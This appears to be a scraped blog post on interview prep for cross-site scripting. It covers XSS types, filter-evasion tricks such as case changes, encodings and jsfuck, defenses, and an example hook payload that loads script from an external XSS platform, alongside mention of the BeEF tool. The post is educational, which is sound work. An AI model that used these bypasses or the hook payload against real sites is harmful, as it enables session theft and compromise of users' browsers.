当前位置:网站首页>XSS (cross site scripting attack) for security interview
XSS (cross site scripting attack) for security interview
2022-07-06 14:16:00 【Unknown white hat】
1、XSS principle : Developers did not do a good job of filtering , As a result, we can close the tag and insert and execute malicious JS Code
2、xss Type classification
DOM type : from DOM The document is parsed
reflective : Plug and play , Not stored in the database
Storage type : Stored in the database , Cause persistent attacks
3、 frequently-used JS function
document.cookie(): Pop up the browser of the current web address cookie
console.log('xss'): Log output at the console
4、 Way around
4.1. Change case :<SCript>
4.2. Code bypass (html Entity encoding 、 Decimal hexadecimal octal encoding 、unicode code )、
4.3. Turn off the tag : Use the greater than sign > Closing the tag makes xss take effect
4.4. Double write and forgive :<scr<script>ipt>
4.5. You can use spaces . Line break ,tab Key or /**/,/*!a*/, Bypass keyword detection in the form of
4.6. use / Instead of spaces
4.7. Use inverted quotation marks instead of parentheses 、 Double quotes
4.8. use throw Replace brackets
4.9. use html Entity encoding : Instead of a colon
4.10. use jsfuck Encoding bypasses most character filtering
5、 Scan tool
xsstrick
6、XSS Fishing platform
kali Tools :BEEF
Free platform :https://xss.pt/
Phishing statement :<img src=https://xss.pt/hook.js>
7、xss defense
7.1、 Filter sensitive characters , for example :aler()、<script>、onerror
7.2、 increase httponly: Front end execution is prohibited JS Code
边栏推荐
猜你喜欢
内网渗透之内网信息收集(二)
Matlab opens M file garbled solution
HackMyvm靶机系列(5)-warez
内网渗透之内网信息收集(四)
网络基础详解
. How to upload XMIND files to Jinshan document sharing online editing?
Detailed explanation of network foundation
Wei Shen of Peking University revealed the current situation: his class is not very good, and there are only 5 or 6 middle-term students left after leaving class
【VMware异常问题】问题分析&解决办法
附加简化版示例数据库到SqlServer数据库实例中
随机推荐
Ucos-iii learning records (11) - task management
xray与burp联动 挖掘
SRC mining ideas and methods
Detailed explanation of network foundation routing
Poker game program - man machine confrontation
Matlab opens M file garbled solution
HackMyvm靶机系列(3)-visions
Callback function ----------- callback
JDBC事务、批处理以及连接池(超详细)
Intranet information collection of Intranet penetration (I)
Record an edu, SQL injection practice
[data processing of numpy and pytoch]
sqqyw(淡然点图标系统)漏洞复现和74cms漏洞复现
1143_ SiCp learning notes_ Tree recursion
Hackmyvm target series (7) -tron
DVWA (5th week)
7-7 7003 combination lock (PTA program design)
【头歌educoder数据表中数据的插入、修改和删除】
Experiment 7 use of common classes
攻防世界MISC练习区(gif 掀桌子 ext3 )